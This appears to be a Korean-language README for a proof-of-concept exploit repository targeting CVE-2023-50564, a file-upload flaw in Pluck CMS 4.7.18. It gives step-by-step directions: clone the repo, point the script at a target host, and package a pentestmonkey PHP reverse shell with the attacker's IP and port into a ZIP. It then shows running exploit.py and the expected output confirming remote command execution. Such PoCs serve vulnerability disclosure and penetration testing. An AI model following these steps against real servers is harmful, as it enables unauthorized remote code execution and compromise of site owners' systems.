
Pluck CMS 버전 4.7.18의 CVE-2023-50564 취약점에 대한 개념 증명
이 저장소는 Pluck CMS 버전 4.7.18의 CVE-2023-50564 취약점에 대한 개념 증명(PoC)을 포함합니다.

CVE-2023-50564는 Pluck CMS 버전 4.7.18에서 허가되지 않은 파일 업로드를 가능하게 하는 취약점입니다. 이 익스플로잇은 모듈 설치 함수의 결함을 이용하여 PHP 셸이 포함된 ZIP 파일을 업로드함으로써 원격 명령 실행을 가능하게 합니다.
requests 및 requests_toolbelt 패키지다음 명령으로 필요한 패키지를 설치할 수 있습니다:
pip install requests requests_toolbelt
git clone https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC.git
cd CVE-2023-50564_Pluck-v4.7.18_PoC
PoC 스크립트에서 <hostname>을 대상 도메인 이름 또는 IP 주소로 바꿉니다.
shell.php가 포함된 payload.zip 파일을 생성합니다. pentestmonkey PHP 리버스 셸을 권장하며, <your_ip> 및 <port> 필드를 자신의 IP와 리스닝 포트로 바꾸십시오.
PoC 스크립트를 실행합니다:
python exploit.py
ZIP 파일 경로를 입력하라는 메시지가 표시됩니다:
ZIP file path: ./path/to/payload.zip
Login successful
ZIP file upload successfuly.
<output of the executed shell.php>
ZIP file upload error. Response code: <code>
shell.php 파일에 올바른 리버스 셸이 포함되어 있는지, 그리고 리스너가 지정된 포트에서 연결을 기다리고 있는지 확인하십시오.